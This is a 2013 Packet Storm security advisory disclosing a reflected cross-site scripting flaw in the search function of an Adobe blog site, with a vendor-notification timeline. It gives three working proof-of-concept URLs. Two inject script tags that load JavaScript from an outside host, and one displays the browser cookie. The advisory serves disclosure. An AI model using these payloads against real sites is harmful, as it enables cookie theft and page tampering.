Adobe Experience Cross Site Scripting

🗓️ 20 Jan 2013 00:00:00Reported by Janne AhlbergType

packetstorm🔗 packetstormsecurity.com👁 16 Views

Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability, search function affecte

`----------------------------------------------------------------------------------------------------  
Title : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability  
  
Vendor : Adobe Systems Incorporated (http://www.adobe.com)  
  
Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacks  
  
Advisory time-line:  
----------------------------------------------------------------------------------------------------  
- Vendor PSIRT notified : 05-Aug-2012   
- Vendor response : 05-Aug-2012. Ticket created. "Looking into it now".  
- Status requests : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012  
  
Adobe PSIRT has not responded to any requests after 09-Nov-2012  
  
- Packet Storm advisory : 19-Jan-2013  
  
Test environment  
----------------------------------------------------------------------------------------------------  
- Latest Firefox browser  
  
  
Details  
----------------------------------------------------------------------------------------------------  
Affected functionality: search function  
  
Test #1: Remote Javascript execution: display browser cookie  
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8  
  
Test #2, Remote Javascript execution: overwrite HTML content - PoC  
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8  
  
Test #3, Alert test with image-tag  
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8  
  
Note: the Javascript test cases are not malicious.  
  
Researcher  
----------------------------------------------------------------------------------------------------  
Janne Ahlberg   
Twitter: https://twitter.com/JanneFI  
Blog: http://janne.is  
Project site: http://idash.net  
----------------------------------------------------------------------------------------------------  
`

20 Jan 2013 00:00Current

0.7Low risk

Vulners AI Score0.7